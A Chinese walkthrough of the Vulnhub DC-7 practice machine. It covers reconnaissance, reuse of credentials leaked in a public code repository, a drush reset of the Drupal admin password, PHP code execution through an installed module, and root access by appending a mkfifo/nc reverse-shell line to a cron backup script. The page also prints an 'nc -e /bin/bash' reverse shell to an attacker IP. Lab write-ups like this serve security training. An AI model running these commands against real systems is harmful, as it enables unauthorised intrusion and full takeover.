Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)
Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)
靶机下载地址:https://www.vulnhub.com/entry/dc-7,356/
将下载好的靶机导入到VMware虚拟机中,设置网络模式为NAT模式,开启靶机虚拟机
使用nmap进行主机发现的扫描,命令nmap -Pn 192.168.172.1/24
扫描到靶机IP后再使用nmap扫描靶机的操作系统,开放端口和对应服务等信息,命令nmap -T4 -A -p- 192.168.172.146
发现靶机开放22端口ssh服务和80端口的http服务
然后直接在kali机打开浏览器输入地址http://192.168.172.146
进行访问
这里给到一些提示,同时也看到这应该是一个基于Drupal CMS的网页,然后又在搜索框这里试了一下注入啥的,好像没用
这里有登录框,随便输入试一下,没有什么特别的反应
暴力破解也没啥用,使用drupal的exp也没用了,网站首页提示我们要跳出框框思考,要开一开脑洞,然后又发现主页多出了一个这个东西
然后去百度或者Google里面搜索一下,,果然发现惊喜
发现一个staffdb的源码文件夹,这应该就是DC-7的突破口,然后我们直接点击staffdb查看源码
有这么多源码文件,所以我们先从比较典型的看起走,先看config.php吧,直接点开查看
点开就发现了账户名和密码,然后我们使用这个账户名和密码在网页登录处登录,但是登录不了诶
然后我们尝试一下使用ssh连接靶机试一试,惊奇地发现竟然成功了
查看一下dc7user目录下有没有什么文件或者目录,发现真有,backups目录和mbox文件
然后查看mbox文件
发现在/opt/scripts/目录下存在一个可执行文件backups.sh,并且发现每隔15分钟就会备份一次
现在进入backups目录查看,存在两个gpg文件
没什么用,然后又进入/opt/scripts/目录,等等,这里还提示了you have a new mail in /var/mail/dc7user,我们进入/var/mail目录看看
也是备份文件,没啥用,,然后又回到/opt/scripts目录下,查看文件backups.sh,命令cat backups.sh
百度了发现drush是专门用来管理drupal站点的shell,可以用来修改admin账户的密码,使用命令drush user-password admin --password='admin
,修改admin账户的密码为admin,这里需要回到/var/www/html目录下命令才可以执行成功
然后到网页处使用账户密码admin和admin进行登录
登录成功,然后在Content—>Add content–>Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,百度后知道Drupal 8后为了安全,需要将php单独作为一个模块导入
然后点击Manage,再点击Extend,再点击Install new module
在这里输入插件地址,插件地址为
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
插件地址在这里查看寻找https://www.drupal.org/project/php,这是PHP插件的介绍页,然后点击install进行安装
安装成功即可
然后点击【extend】,看到这里多出来一个php filter,勾选上
然后向下翻,找到并点击install
先点击【admin】,再点击【view profile】,回到这里
然后再点击【home】回到主页面
然后点击【Edit】
先在这里选择PHP code
然后在body里面写入测试代码<?php phpinfo(); ?>
,点击【save】,可看到代码执行成功
代码执行成功
然后修改代码,写入反弹shell的代码,先在kali中使用命令nc -lvvp 1234
进行监听
然后回到网页主页面,点击【Edit】,修改刚才的代码为<?php system('nc -e /bin/bash 192.168.172.131 1234'); ?>
,点击【save】
kali这边已经成功连接
但是这个shell是非交互式的shell,所以使用命令python -c "import pty; pty.spawn('/bin/bash')"
,来获取一个交互式的shell
进入/opt/scripts目录下,在该目录下的backups.sh脚本文件所属组是www-data,所以www-data用户可以对这个脚本文件进行操作,并且这个脚本文件可以定时执行,所以可以用它来反弹shell
使用命令echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.172.131 2345 >/tmp/f" >> backups.sh
将反弹shell的命令写入到backups.sh文件中,当它定时自动执行时即可执行其中的反弹shell语句,即可反弹回shell,大概需要等待15分钟
反弹成功,且反弹回来的shell即为root权限的shell,跳转到/root目录下可查看theflag.txt文件
Vulnhub靶场渗透测试系列DC-7(跳出框框打开脑洞 drush更改drupal的admin账户密码)相关推荐
- Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)
Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...
- Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权)
Vulnhub靶场渗透测试系列DC-2(wpscan使用和git提权) 靶机地址:https://www.five86.com/dc-2.html 下载靶机将其导入到VMware,然后设置网络模式为N ...
- kali渗透测试系列---信息收集
kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...
- DC系列漏洞靶场-渗透测试学习复现(DC-1)
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场:DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们 ...
- 渗透测试php靶场,渗透测试靶场初体验
声明本文仅供学习和研究,由于传播.利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,海青实验室及文章作者不承担任何责任. 安全狗海青实验室拥有此文章的修改和解释权,如欲转载 ...
- Kali linux渗透测试系列————23、Kali linux 渗透攻击之服务器端攻击
漏洞评估 服务器端攻击即找出并利用服务器上的服务.端口和应用程序中的漏洞.举个例子,Web服务器都有多个攻击途径(Attack Vector).它会运行一个操作系统,并运行各种各样的软件来提供Web功 ...
- Kali linux渗透测试系列————24、Kali linux 渗透攻击之客户端攻击
客户端攻击 客户端(client)或主机(host)是指用来上网的终端设备,比如计算机.平板电脑或是移动设备.客户端可能会为其他客户端提供信息.服务及应用,或是从其他系统(比如服务器)获取信息.通常, ...
- whoami靶场渗透测试
文章标题 测试环境 信息收集 获取靶机ip 扫描端口 扫描目录 开始渗透 文件下载漏洞 获取数据库账号密码 知晓sql注入绕过方式 登录前端 文件上传+包含漏洞getshell 失败的提权 方法一:s ...
- Kali linux渗透测试系列————34、Kali linux 维持访问之创建Web后门
WeBaCoo WeBaCoo(Web Backdoor Cookie)是一款隐蔽的脚本类Web后门工具.借助HTTP协议,它可以在客户端和服务器端实现执行代码的网页终端. WeBaCoo有两种工作模 ...
最新文章
- 我的一些项目管理经验
- oss图片数据转图片二进制数据_图片数据不够快来试试这些数据增强
- ThinkPHP--栏目增删改查ADSF
- 【ArcGIS风暴】数字化实验:数据采集与编辑完整操作流程
- Jupyter Notebook命令行启动报错: DLL load failed
- MogDB存储过程事务控制与异常块
- Android 系统(181 )----Android中各类.mk文件的编写
- 游戏股的年过完了,盈利下滑,有企业靠卖房维持业绩
- python学习:Python 包
- Mysql-sql_mode
- redis持久化RDB与AOF
- 0配置EF连接MySql数据库_第八节:EF Core连接MySql数据库
- opencv-Mat数据类型及位数总结
- 神经网络入门学习-一些基本的概念+不含隐层
- 调节RStudio的代码字体大小
- AutoCAD 2021 安装 详细教程
- 数模笔记之“Q值分配法、比例加惯例(D‘Hondt)” matlab代码
- win10 电脑自带的便签在哪里
- 多模态 跨模态|人机交互新突破!
- springboot模板
热门文章
- 海通证券:云管理平台统一纳管金融云混合基础设施
- css实现文本框中内容超出长度显示省略号,鼠标移入悬浮显示全部内容
- 分布式session解决——Spring-data-redis
- Win11最新KB5019980(22621.819)更新内容详解
- 新型威胁分析与防范研究
- SQL入门经典第5版(Sams Teach Yourself SQL in 24 Hours, 5th)随书习题的建表和插入
- 【Simulink教程案例7】基于Simulink的滑模控制器设计与实现
- Python 爬取火车票信息(易于理解版)
- [转] 身为管理者 会讲的六十八个故事
- 方舟开服务器教程——开服配置常见问题及解决方法